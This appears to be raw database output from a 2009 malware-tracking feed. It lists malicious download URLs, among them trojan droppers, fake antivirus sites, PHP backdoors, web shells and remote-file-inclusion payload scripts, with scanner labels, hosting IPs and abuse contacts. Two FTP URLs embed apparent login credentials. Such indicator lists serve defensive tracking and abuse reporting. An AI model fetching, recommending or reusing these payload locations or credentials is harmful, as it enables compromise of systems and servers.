| 2009-07-14 18:58:01 | trendmicro | TSPY_ZBOT.MCS | 61.235.117.83 | wangpei@chinatietong.com | CN | APNIC | CRTC | http://allavers.org/_vps_lib/ldr.exe |
| 2009-07-14 18:58:00 | avira | TR/FraudPack.any | 72.34.43.224 | admin@ihnetworks.net | US | ARIN | IHNET-PI-1 | http://arkbroadcasters.org/loader.exe |
| 2009-07-08 15:01:11 | avira | TR/Dropper.Gen | 210.51.181.129 | cncipaddr@china-netcom.com | CN | APNIC | CNC-BJ-IDC | http://youtube-adult.name/id_0122.exe |
| 2009-07-06 19:04:09 | undef | unknown_exe | 82.103.141.146 | abuse@easyspeedy.com | DK | RIPE | EASYSPEEDY-NETWORK | http://www.ymmoo.net/setup_ymmoo.exe |
| 2009-07-01 17:53:46 | undef | unknown_exe | 74.125.39.137 | arin-contact@google.com | US | ARIN | GOOGLE | http://kodenadaqequnul2.googlegroups.com/web/a289743kjhfkjhkj3hkj.swf?gda=q-N2NUsAAACuGiGjtYknYpnLJ9JOD6VhQaFUmokO1f_8pAMqUmUp_d812b7JYV_uUBJlRIiigwRbYpQIvmf_l9f_E8k9I2rxBkXa90K8pT5MNmkW1w_4BQ |
| 2009-06-30 14:01:50 | undef | unknown_exe | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://palsol.com/downloads/spyrem_setup.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-06-30 14:01:50 | avira | TR/Dldr.Agent.yhp | 217.76.156.92 | abuse@tpnet.pl | PL | RIPE | NET-PIENSASOLUTIONS-2 | http://sapacontenedores.com/get_flash_update.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 70.38.54.20 | abuse@noc.privatedns.com | CA | ARIN | IWEB-BLK-05 | http://spyremover.com/downloads/SpyRemoverSetup.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 62.149.174.149 | hostmaster@technorail.com | IT | RIPE | TECHNORAIL-NET | http://www.artistinove.it/shok_video.exe |
| 2009-06-30 14:01:50 | avira | TR/Crypt.ZPACK.Gen | 61.139.126.14 | anti-spam@ns.chinanet.cn.net | CN | APNIC | CHINANET-SC | http://www.nicovedeo.com/watch/ma.exe |
| 2009-06-30 14:01:50 | avira | DR/KeyLog.32 | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://www.palsol.com/downloads/v3/Setup_CSS_Shareware.exe |
| 2009-06-30 14:01:50 | avira | DR/KeyLog.32.1 | 208.113.150.124 | abuse@dreamhost.com | US | ARIN | DREAMHOST-BLK6 | http://www.palsol.com/downloads/v3/Setup_PCS_Shareware.exe |
| 2009-06-30 14:01:50 | avira | ADSPY/Softomat.E.10 | 64.111.196.124 | abuse@isprime.com | US | ARIN | ISPRIME-ARIN-2 | http://www.peakclick.com/toolbar/1/toolbar.exe |
| 2009-06-30 14:01:50 | undef | unknown_exe | 64.208.226.93 | abuse@gblx.net | US | ARIN | GBLX-11A | http://www.privacy-care.com/bin/SpywareExpertInstall.exe |
| 2009-06-30 14:01:49 | avira | TR/Dldr.Fake.CGAV | 76.76.103.164 | abuse@existhosting.com | CA | ARIN | INTERWEB-MEDIA | http://guardlab2009.biz//InstallerWF.exe |
| 2009-06-30 14:01:49 | avira | TR/Dldr.Fake.CGAV | 76.76.103.164 | abuse@existhosting.com | CA | ARIN | INTERWEB-MEDIA | http://guardlab2009.net//InstallerWF.exe |
| 2009-06-30 14:01:49 | avira | TR/Crypt.ZPACK.Gen | 65.61.216.163 | abuse@in2net.com | CA | ARIN | IN2NETWORK | http://healthylifehypnotherapy.com/flashcodecinstall_13_31.exe |
| 2009-06-30 14:01:49 | avira | ADSPY/DiscoveryLive.A | 64.22.66.202 | abuse@gnax.net | US | ARIN | GNAXNET | http://mdl.stuffplug.com/MDL_1.3.0300.exe |
| 2009-06-30 14:01:49 | undef | unknown_$INSTDIR/DivxPlayer.exe | 207.218.211.242 | abuse@ev1servers.net | US | ARIN | EVRY-BLK-1 | http://divx-player.ivefound.com/./download/DivxPlayerSetup.exe |
| 2009-06-30 14:01:49 | undef | unknown_$SHELc[17]/360safe/Shield/Install/360sandbox.exe | 60.170.241.23 | wanglinlin2@anhuitelecom.com | CN | APNIC | CHINANET-AH | http://down.360safe.com/se/360se_1.3.exe |
| 2009-06-30 14:01:49 | undef | unknown_exe | 221.203.179.20 | abuse@online.ln.cn | CN | APNIC | CNCGROUP-LN | http://down.sandai.net/Thunder5.8.7.625.exe |
| 2009-06-24 02:55:18 | avira | TR/ATRAPS.Gen | 208.196.247.108 | NETQ@aitcom.net | US | ARIN | UUNET1996B | http://208.196.247.108/awstats/classes/src/Telegrama-7614.scr |
| 2009-06-23 23:55:13 | avira | TR/Spy.Banker.ABPR | 60.208.77.210 | abuse@cnc-noc.net | CN | APNIC | CNCGROUP-SD | http://60.208.77.210/MOD/MODULO-ITAU.exe |
| 2009-06-06 04:55:08 | avira | TR/Spy.Banker.ABOH | 82.148.36.77 | abuse@fastnet.co.uk | GB | RIPE | FN-ADSL-1678 | http://82.148.36.77/icons/BBModuloSeg.exe |
| 2009-05-25 17:55:09 | avira | DR/FakeAV.MX | 221.5.74.38 | abuse@cnc-noc.net | CN | APNIC | CNCGROUP-GD | http://dl.guarddog2009.com/av.exe |
+----------------------+------------+-----------------------------------------------------------+-----------------+------------------------------+---------+--------+-----------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
54 rows in set (0.00 sec)
-
another bunch of malwarlinks since 19th of Jul 2009
+----------------------+---------+-----------------------+-----------------+----------------------------------+---------+--------+----------------------------+---------------------------------------------------------------------------------+
| from_unixtime(first) | scanner | virusname | review | email | country | source | netname | url |
+----------------------+---------+-----------------------+-----------------+----------------------------------+---------+--------+----------------------------+---------------------------------------------------------------------------------+
| 2009-07-21 13:02:15 | avira | BDS/PHP.Small.O.12 | 89.108.90.204 | abuse@agava.com | RU | RIPE | AGAVACOMPANY | http://www.mosautores.ru/smiles/ec.txt |
| 2009-07-21 12:53:17 | avira | PHP/BackDoor.AR | 208.109.181.40 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.hydromatrixdesigns.com/copyright.txt |
| 2009-07-21 12:52:59 | avira | PHP/Pbot.A.6 | 165.141.177.14 | no-email-erx@apnic.net | KR | APNIC | KUMHONET | http://www.dwsub301.co.kr/load |
| 2009-07-21 12:40:31 | undef | unknown_html_RFI_php | 78.129.205.94 | abuse_rs@altervista.it | IT | RIPE | AlterVista_1 | http://roxe.altervista.org/id1.txt |
| 2009-07-21 12:28:50 | undef | unknown_html_RFI_php | 208.109.181.40 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.hydromatrixdesigns.com/license.txt |
| 2009-07-21 12:13:04 | avira | BDS/PHP.Small.O.36 | 87.118.64.36 | vertrieb@aaa-webservice.de | DE | RIPE | DE-KEYWEB-AAA | http://www.goldstrategie.ch/images/icons/inv.png |
| 2009-07-21 11:51:59 | undef | unknown_html_RFI_php | 205.134.162.147 | nc@ai.net | US | ARIN | AINET-BLK | http://cebongbugil.justfree.com/sh/billing.txt |
| 2009-07-21 11:38:10 | avira | PHP/BackDoor.AR | 93.188.245.224 | postmaster@t-wp.de | DE | RIPE | TSES-ITO-CSS-RE-NO-HAM | http://www.beru.com/deutsch/inc/pdf/.schulle/id2.txt |
| 2009-07-21 11:23:20 | undef | unknown_html_RFI_php | 205.134.162.147 | nc@ai.net | US | ARIN | AINET-BLK | http://cebongbugil.justfree.com/sh/id1.txt |
| 2009-07-21 10:37:47 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://shefan.fileave.com/botbom.txt |
| 2009-07-21 09:48:23 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://playboy88.fileave.com/cer88.txt |
| 2009-07-21 09:48:02 | clamav | PHP.Bot-6 | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://playboy88.fileave.com/ping.txt |
| 2009-07-21 08:07:01 | undef | unknown_html_RFI_php | 70.85.33.242 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-13 | http://cpi.cpi.co.za/includes/baner.txt |
| 2009-07-21 07:24:40 | avira | PHP/Pbot.A.6 | 75.126.192.185 | abuse@softlayer.com | US | ARIN | SOFTLAYER-NETBLOCK4 | http://hayxonz.free-site-host.com/fragnet.txt |
| 2009-07-21 07:20:49 | avira | PHP/Zapchast.C | 89.108.90.204 | abuse@agava.com | RU | RIPE | AGAVACOMPANY | http://www.mosautores.ru/smiles/r0x.txt |
| 2009-07-21 06:52:06 | undef | unknown_html_RFI_php | 89.17.220.221 | luis@miarroba.net | ES | RIPE | MIARROBA-NET | http://byeisenheim.webcindario.com/tools/Teste.txt |
| 2009-07-21 05:56:47 | clamav | Trojan.Agent-118946 | 91.214.45.73 | abuse@altushost.com | BZ | RIPE | ALTUSHOST-NET | http://bigdron.com/download/6c715a5261673d3d173590f820090701/mediaplayer.exe |
| 2009-07-21 05:56:46 | avira | BDS/Agent.1260.A | 194.85.240.210 | timur@ksu.ras.ru | RU | RIPE | KC-NET | http://194.85.240.210/pup//config/card.exe |
| 2009-07-21 05:20:17 | undef | unknown_html_RFI_php | 93.188.245.224 | postmaster@t-wp.de | DE | RIPE | TSES-ITO-CSS-RE-NO-HAM | http://www.beru.com/deutsch/inc/pdf/.schulle/id1.txt |
| 2009-07-21 04:46:02 | avira | BDS/PHP.ali.13 | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://mh4yh4.fileave.com/id.txt |
| 2009-07-21 04:42:58 | clamav | PHP.Bot-1 | 140.174.96.41 | abuse@ntt.net | US | ARIN | NTTA-140-174 | http://thaibestholiday.com/pic_home/bot.txt |
| 2009-07-21 04:41:36 | clamav | PHP.Defacer | 74.220.215.70 | abuse@bluehost.com | US | ARIN | BLUEHOST-NETWORK-2 | http://facxt.com/tool20/tool20.dat |
| 2009-07-21 04:35:36 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://mh4yh4.fileave.com/copyright.txt |
| 2009-07-21 04:12:56 | undef | unknown_html_RFI_php | 200.58.114.12 | marketing@DATTATEC.COM | AR | LACNIC | AR-DATT-LACNIC | http://www.futbol-local.com/joom/pwn/fx29id.txt |
| 2009-07-21 03:17:43 | clamav | PHP.Shell-22 | 70.35.16.97 | abuse@netfirms.com | CA | ARIN | NET-NF-00 | http://cornect.com/vnc/fx29sh.txt |
| 2009-07-21 03:15:30 | avira | BDS/PHP.ali.9 | 202.29.24.15 | unnop@uni.net.th | TH | APNIC | THAINET-TH | http://www.snru.ac.th/kmc/gefel.txt |
| 2009-07-21 02:56:42 | avira | TR/Crypt.XPACK.Gen | 89.149.254.174 | info@netdirekt.de | DE | RIPE | NETDIRECT-NET | http://scanme-now.com/s/w040259596dj72g74s/setup.exe |
| 2009-07-21 02:18:20 | avira | PHP/Agent.G | 123.141.123.141 | abuse@bora.net | KR | APNIC | BORANET | http://www.ozin.co.kr/data/oil2.txt |
| 2009-07-21 01:40:10 | avira | PHP/BackDoor.AR | 62.149.140.94 | hostmaster@technorail.com | IT | RIPE | TECHNORAIL-NET | http://www.racingbikesrl.com/modules/fx29id2.txt |
| 2009-07-21 01:20:24 | avira | PHP/BackDoor.AR | 70.35.16.97 | abuse@netfirms.com | CA | ARIN | NET-NF-00 | http://cornect.com/vnc/fx29id2.txt |
| 2009-07-21 01:16:10 | undef | unknown_html_RFI_php | 70.35.16.97 | abuse@netfirms.com | CA | ARIN | NET-NF-00 | http://cornect.com/vnc/fx29id.txt |
| 2009-07-21 00:49:49 | undef | unknown_html_RFI | 204.2.183.50 | abuse@ntt.net | US | ARIN | NTTA-204 | http://edbotflv.webs.com/fx29id.txt |
| 2009-07-21 00:48:47 | undef | unknown_html_RFI_php | 70.35.16.97 | abuse@netfirms.com | CA | ARIN | NET-NF-00 | http://cornect.com/vnc/spread.txt |
| 2009-07-21 00:33:32 | clamav | PHP.Downloader | 70.35.16.97 | abuse@netfirms.com | CA | ARIN | NET-NF-00 | http://cornect.com/vnc/spreadromenia.txt |
| 2009-07-21 00:32:25 | avira | PHP/BackDoor.AR | 208.86.185.139 | abuse@hostican.com | US | ARIN | HOSTICAN-NETWORK | http://www.bodytweaking.com/wp-content/id2.txt |
| 2009-07-21 00:32:21 | undef | unknown_html_RFI_php | 208.86.185.139 | abuse@hostican.com | US | ARIN | HOSTICAN-NETWORK | http://www.bodytweaking.com/wp-content/id1.txt |
| 2009-07-20 23:02:56 | undef | unknown_html_RFI_php | 82.204.219.218 | noc@pochta.ru | RU | RIPE | POCHTA_RU-NET | http://fotos.traicao0.smtp.ru/flashcard/cmdscan.txt |
| 2009-07-20 22:37:20 | clamav | PHP.Remoteadmin-2 | 205.134.252.112 | abuse@corporatecolo.com | US | ARIN | CORPCOLO-NET | http://bruntil.com/cgi/hit |
| 2009-07-20 22:31:02 | clamav | PHP.Shell-23 | 130.111.220.248 | abuse@maine.edu | US | ARIN | UMAINE-SYS | http://sato.asap.um.maine.edu//mcs/Library/key/test.txt |
| 2009-07-20 22:22:30 | undef | unknown_html_RFI_php | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/djerink_anyib/BaruLagi/Botping.txt |
| 2009-07-20 21:54:47 | undef | unknown_html_RFI_php | 200.98.196.94 | l-registrobr-uol@corp.uol.com.br | BR | LACNIC | 001.109.184/0001-95 | http://www.msgwebmailcontrol.com/send/gostoso.jpg |
| 2009-07-20 21:31:03 | avira | PHP/Zapchast.C | 80.93.54.78 | abuse@peterhost.ru | RU | RIPE | PETERHOST-PITER | http://mnogo-piva.ru/catalog/id.txt |
| 2009-07-20 21:30:01 | undef | unknown_html_RFI | 205.178.145.65 | mark.salerno@inquent.com | CA | ARIN | INQUENT-2 | http://www.new-cairo.com//idste.txt |
| 2009-07-20 21:18:35 | clamav | PHP.Id | 206.41.118.5 | abuse@risingnet.net | US | ARIN | RISINGNET-IP1 | http://www.ciuz-shells.net/joomjoom/media/r0x-id.txt |
| 2009-07-20 21:06:51 | avira | PHP/C99Shell.C | 64.91.254.83 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB | http://baseirc.net/cmd |
| 2009-07-20 20:49:48 | avira | BDS/PHP.ali.9 | 216.55.97.244 | parsi@simi.org.ir | IR | RIPE | SMSV-BLK-1 | http://www.zanteweb.gr/zante-forums-old/chat/inc/maillist//maillist/admin/thumb |
| 2009-07-20 20:48:28 | avira | BDS/PHP.Small.O.12 | 80.93.54.78 | abuse@peterhost.ru | RU | RIPE | PETERHOST-PITER | http://mnogo-piva.ru/catalog/readme.txt |
| 2009-07-20 20:38:49 | avira | PHP/BackDoor.AR | 71.18.198.1 | abuse@ecommerce.com | US | ARIN | OPENTRANSFER-ECOMMERCE | http://forum.vinamin.vn/fid.txt |
| 2009-07-20 19:41:25 | clamav | PHP.Downloader | 76.163.230.34 | abuse@ecommerce.com | US | ARIN | ECOMMERCE-HOSTING | http://solelyyoursgem.com/img/products/mar/pendant/images/bot/spread/spread.txt |
| 2009-07-20 19:41:15 | avira | SPR/PHP.ID | 76.163.230.34 | abuse@ecommerce.com | US | ARIN | ECOMMERCE-HOSTING | http://solelyyoursgem.com/img/products/mar/pendant/images/bot/racrew/id.txt |
| 2009-07-20 19:36:26 | undef | unknown_html_RFI_php | 12.180.200.217 | scam@abuse-att.net | US | ARIN | ATT | http://www.amembersignup.com/signup/MF.txt |
| 2009-07-20 19:31:41 | clamav | PHP.Bot-6 | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://iyunk.fileave.com/ping.txt |
| 2009-07-20 19:29:19 | clamav | PHP.Shell-8 | 204.2.183.50 | abuse@ntt.net | US | ARIN | NTTA-204 | http://edbotflv.webs.com/fx29id2.txt |
| 2009-07-20 18:58:02 | undef | unknown_html_RFI_php | 58.120.227.233 | abuse@hanaro.com | KR | APNIC | HANANET | http://www.junggosum.com/bbs/data/sports_2/idxx.txt |
| 2009-07-20 18:38:41 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://flamers.fileave.com/php.txt |
| 2009-07-20 18:27:10 | undef | unknown_html_RFI_php | 84.247.200.146 | asr@qualitynet.net | KW | RIPE | QNETSERVERFARM | http://www.suiteinn.it/news/images/idxx.txt |
| 2009-07-20 18:22:44 | clamav | PHP.Id-14 | 91.205.125.20 | abuse@gigabase.com | RU | RIPE | GIGABASE-NET | http://box.dmon.com/id.txt |
| 2009-07-20 18:20:21 | avira | PHP/BackDoor.E | 217.149.62.1 | abuse@futuron.org | FI | RIPE | WEBHOTELLI-SRV | http://fctribe.com/data/copyright.txt |
| 2009-07-20 17:59:47 | avira | BDS/Agent.1260.A | 212.67.202.65 | abuse@pipex.net | GB | RIPE | UK-PIPEX-HOSTED-SERVERS-12 | http://themusicnetwork.co.uk/l/special_greetings.exe |
| 2009-07-20 17:47:23 | avira | PHP/Spam.5833 | 202.153.125.212 | support@pbase.net | HK | APNIC | POWERBASE-HK | http://www.datum.com.hk/database_script_16Jul09.txt |
| 2009-07-20 17:26:04 | avira | SPR/PHP.ID | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://camila69.fileave.com/id.txt |
| 2009-07-20 17:19:56 | avira | PHP/Small.C | 207.126.164.194 | robert@skiplink.com | US | ARIN | SKIPLINK | http://slam.magicshells.com/~hex/ribz.txt |
| 2009-07-20 17:13:08 | avira | PHP/C99Shell.B | 96.31.76.130 | abuse@noc4hosts.com | US | ARIN | NOC4HOSTS1 | http://www.myshellcode.com/c100.txt |
| 2009-07-20 16:46:49 | undef | unknown_html_RFI_php | 69.64.76.172 | abuse@aplus.net | US | ARIN | ABAC2006A | http://www.ohmyflash.com/uiu.txt |
| 2009-07-20 16:20:36 | undef | unknown_html_RFI_php | 62.149.140.94 | hostmaster@technorail.com | IT | RIPE | TECHNORAIL-NET | http://www.z-wave-europe.org/x |
| 2009-07-20 15:47:09 | avira | SPR/PHP.ID | 200.160.204.195 | eduardop@durand.com.br | BR | LACNIC | 059.278.085/0001-17 | http://www.afmarcenaria.com.br/templates/hotel/css/idd.txt |
| 2009-07-20 15:41:15 | avira | PHP/Rst.F | 84.246.225.186 | elbaze@elb.fr | FR | RIPE | BOULAHBEL | http://www.latitude-voile.com/latitude/images/r57 |
| 2009-07-20 15:29:31 | avira | SPR/PHP.ID | 91.197.130.18 | info@data-xata.com | UA | RIPE | DATAXATA-NET | http://plengeh.wen.ru/id.txt |
| 2009-07-20 14:59:59 | avira | SPR/PHP.ID | 61.63.3.40 | hostmaster@twnic.net.tw | TW | APNIC | TWNIC-TW | http://www.emc2watches.com//UserFiles/ivid.txt |
| 2009-07-20 14:54:04 | clamav | PHP.Id-3 | 216.120.231.11 | john@hostrocket.com | US | ARIN | HRWEBSERVICES | http://anotherannarbor.org/izrpx/os.txt |
| 2009-07-20 14:48:56 | undef | unknown_html_RFI_perl | 66.40.52.72 | dhswip@peer1.com | US | ARIN | MAXIM-4 | http://Xiz.freehostia.com/MF.txt |
| 2009-07-20 13:51:41 | undef | unknown_exe | 202.154.57.35 | fax: +98 21 882662 | IR | RIPE | RADNET-NOC-SBY-ID | http://www.eforel.com/templates/ja_drimia/scripts/ja.script.js |
| 2009-07-20 12:40:48 | avira | SPR/PHP.ID | 74.54.97.18 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | http://www.fmi.edu.br/one/idd.txt |
| 2009-07-20 12:30:51 | clamav | PHP.Id-2 | 74.53.28.130 | abuse@theplanet.com | US | ARIN | NETBLK-THEPLANET-BLK-14 | ftp://hollysoc:50283940@74.53.28.130/public_html/v6id.txt |
| 2009-07-20 12:17:37 | avira | BDS/PHP.Small.O.12 | 221.143.40.37 | abuse@hanaro.com | KR | APNIC | HANANET | http://www.waawaa.com//Partner/order/readme.txt |
| 2009-07-20 10:14:53 | undef | unknown_html | 69.50.192.70 | sales@atjeu.com | US | ARIN | ATJEU | http://pcsecurity09.com/ |
| 2009-07-20 10:14:53 | undef | unknown_html | 72.52.210.133 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://pcsecurity-09.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.131 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://homeav2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.132 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://home-anti-virus-2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.131 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://homeantivirus2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.132 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://home-antivirus2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.130 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://homeanti-virus-2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.131 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://home-anti-virus2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.130 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://homeanti-virus2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.133 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://homeantivirus-2010.com/ |
| 2009-07-20 10:14:52 | undef | unknown_html | 72.52.210.132 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://pc-security09.com/ |
| 2009-07-20 10:14:51 | avira | TR/Dropper.Gen | 205.151.16.209 | noc@infoteck.qc.ca | CA | ARIN | IFK-205-151-16-0 | http://205.151.16.209/~susan/E-Greetings.exe |
| 2009-07-20 10:14:51 | undef | unknown_html | 72.52.210.130 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://home-av-2010.com/ |
| 2009-07-20 10:14:51 | undef | unknown_html | 72.52.210.132 | abuse@liquidweb.com | US | ARIN | LIQUIDWEB-6 | http://home-av2010.com/ |
| 2009-07-20 10:05:17 | avira | PHP/BackDoor.AR | 68.178.211.6 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.firearts.org/events/ws/_b |
| 2009-07-20 09:52:01 | undef | unknown_html_RFI_php | 68.178.211.6 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.firearts.org/events/ws/xxx |
| 2009-07-20 09:51:54 | undef | unknown_html_RFI_php | 68.178.211.6 | abuse@godaddy.com | US | ARIN | GO-DADDY-SOFTWARE-INC | http://www.firearts.org/events/ws/_a |
| 2009-07-20 09:25:17 | avira | SPR/PHP.ID | 200.108.36.132 | operaciones@MOVISTAR.COM.PA | PA | LACNIC | PA-BPBS-LACNIC | http://ciudad.latinol.com/susan09/id.txt |
| 2009-07-20 08:44:51 | avira | PHP/Small.C | 94.40.18.13 | marek.czyzowicz@petrosoft.pl | PL | RIPE | PL-PETROSOFT | http://www.sks75.rj.pl/media/spread.txt |
| 2009-07-20 08:37:25 | clamav | PHP.Id | 221.143.46.104 | abuse@hanaro.com | KR | APNIC | HANANET | http://impeel.com/impeel/wizard/roxx_jpg.txt |
| 2009-07-20 08:13:52 | avira | PHP/C99Shell.A | 85.214.69.190 | abuse@strato.de | DE | RIPE | STRATO-RZG-DED2 | http://wikiheaven.de/wikiheaven/templates/special.txt |
| 2009-07-20 08:13:40 | clamav | PHP.Downloader | 85.214.69.190 | abuse@strato.de | DE | RIPE | STRATO-RZG-DED2 | http://wikiheaven.de/wikiheaven/templates/yes.txt |
| 2009-07-20 08:13:28 | avira | SPR/PHP.ID | 85.214.69.190 | abuse@strato.de | DE | RIPE | STRATO-RZG-DED2 | http://wikiheaven.de/wikiheaven/templates/id.txt |
| 2009-07-20 07:52:56 | undef | unknown_html_RFI_php | 202.59.152.102 | hm-changed@apnic.net | HK | APNIC | NET-FNCL | http://hongfuqitian.com/m1.gif |
| 2009-07-20 07:25:45 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://bangsat6.fileave.com/id.txt |
| 2009-07-20 07:19:00 | avira | PHP/IrcBot.F | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://kontil.fileave.com/bot2.txt |
| 2009-07-20 06:57:00 | undef | unknown_html_RFI_php | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://hampod.fileave.com/wet.txt |
| 2009-07-20 03:57:29 | clamav | PHP.Shell-22 | 68.142.212.71 | network-abuse@cc.yahoo-inc.com | US | ARIN | INKTOMI-BLK-4 | http://www.coslcms.org/public/calendar//tools/safe.txt |
| 2009-07-20 02:15:06 | avira | PHP/BackDoor.AR | 66.40.52.72 | dhswip@peer1.com | US | ARIN | MAXIM-4 | http://Xiz.freehostia.com/fx29id2.txt |
| 2009-07-20 01:51:06 | clamav | PHP.Id-2 | 211.202.2.220 | abuse@hanaro.com | KR | APNIC | HANANET | http://dwno.or.kr/bbs/zipcode/v6.txt |
| 2009-07-20 00:39:04 | avira | EXP/PHP.E | 72.5.169.70 | abuse@internap.com | US | ARIN | PNAP-09-2004 | http://eqz.zapto.org/aod.gif |
| 2009-07-19 22:27:51 | avira | PHP/BackDoor.AR | 94.40.18.13 | marek.czyzowicz@petrosoft.pl | PL | RIPE | PL-PETROSOFT | http://www.sks75.rj.pl/media/php.txt |
| 2009-07-19 21:59:55 | avira | PHP/BackDoor.AR | 66.90.104.9 | abuse@fdcservers.net | US | ARIN | FDCSERVERS | http://haxor-vendetta.com/id2.txt |
| 2009-07-19 21:41:18 | clamav | PHP.Shell-22 | 207.126.164.215 | robert@skiplink.com | US | ARIN | SKIPLINK | http://www.magicshells.com/~hex/zenica.txt |
| 2009-07-19 21:33:33 | clamav | PHP.ShellExec | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/robbys.caem/whois.txt |
| 2009-07-19 21:32:45 | avira | PHP/Pbot.A.6 | 66.102.100.85 | dangelo@anet.com | US | ARIN | ANET-BLK-06 | http://www.diversityworking.com/career/o.txt |
| 2009-07-19 21:23:58 | clamav | PHP.Shell | 87.106.54.234 | abuse@schlund.de | DE | RIPE | SCHLUND-CUSTOMERS | http://geschenkpuzzle.de/logs/session/locus.txt |
| 2009-07-19 20:57:04 | avira | TR/PHPShell.U | 210.220.213.203 | abuse@hanaro.com | KR | APNIC | KRNIC-KR | http://www.solmae.co.kr///receipt/lib/_private/sh.txt |
| 2009-07-19 20:37:33 | clamav | PHP.Downloader-4 | 210.220.213.203 | abuse@hanaro.com | KR | APNIC | KRNIC-KR | http://www.solmae.co.kr///receipt/lib/_private/scan/spread.txt |
| 2009-07-19 20:37:18 | avira | PHP/Agent.G | 210.220.213.203 | abuse@hanaro.com | KR | APNIC | KRNIC-KR | http://www.solmae.co.kr///receipt/lib/_private/scan/id.txt |
| 2009-07-19 20:10:29 | avira | PHP/Small.C | 64.185.237.80 | Domains@cbcast.net | US | ARIN | CBCAST | http://www.pupapa.com/zero/tmp/read.txt |
| 2009-07-19 19:47:34 | undef | unknown_html_RFI_php | 218.5.74.92 | fjnic@fjdcb.fz.fj.cn | CN | APNIC | CHINANET-FJ | http://www.yw365.com/images/cache/ml.txt |
| 2009-07-19 19:40:17 | clamav | PHP.Remoteadmin-3 | 203.26.41.138 | vic@cia.com.au | AU | APNIC | CIA-AU | http://mpva.com.au/x |
| 2009-07-19 19:38:01 | avira | PHP/BackDoor.AR | 200.98.196.94 | l-registrobr-uol@corp.uol.com.br | BR | LACNIC | 001.109.184/0001-95 | http://www.msgwebmailcontrol.com/botp/id2.txt |
| 2009-07-19 19:37:40 | undef | unknown_html_RFI_php | 200.98.196.94 | l-registrobr-uol@corp.uol.com.br | BR | LACNIC | 001.109.184/0001-95 | http://www.msgwebmailcontrol.com/botp/id1.txt |
| 2009-07-19 19:27:06 | undef | unknown_html_RFI_php | 98.137.46.72 | network-abuse@cc.yahoo-inc.com | US | ARIN | A-YAHOO-US9 | http://www.geocities.com/djerink_anyib/BaruLagi/Baru.txt |
| 2009-07-19 19:05:16 | avira | EXP/PHP.E | 82.204.219.221 | noc@pochta.ru | RU | RIPE | POCHTA_RU-NET | http://god.paypalgod.pochta.ru/flashcard/cmd.txt |
| 2009-07-19 19:04:13 | undef | unknown_html_RFI_php | 211.234.100.83 | kidc@hanbiro.com | KR | APNIC | KRNIC-KR | http://www.sh1908.org//bbs/1.txt |
| 2009-07-19 18:17:23 | avira | SPR/PHP.Small.F | 81.223.41.226 | abuse@inode.at | AT | RIPE | CISC-Semiconductor | http://www.cisc.at/survey/classes/core/key.gif |
| 2009-07-19 17:57:14 | avira | PHP/C99Shell.C | 201.33.17.118 | contato@datacorpore.com.br | BR | LACNIC | 008.210.265/0001-26 | ftp://oceanovirtual.com.br:200677@oceanovirtual.com.br/x/web.php |
| 2009-07-19 16:58:14 | clamav | PHP.Bot-6 | 64.62.181.43 | abuse@he.net | US | ARIN | HURRICANE-4 | http://uciha.fileave.com/Nanderz.txt |
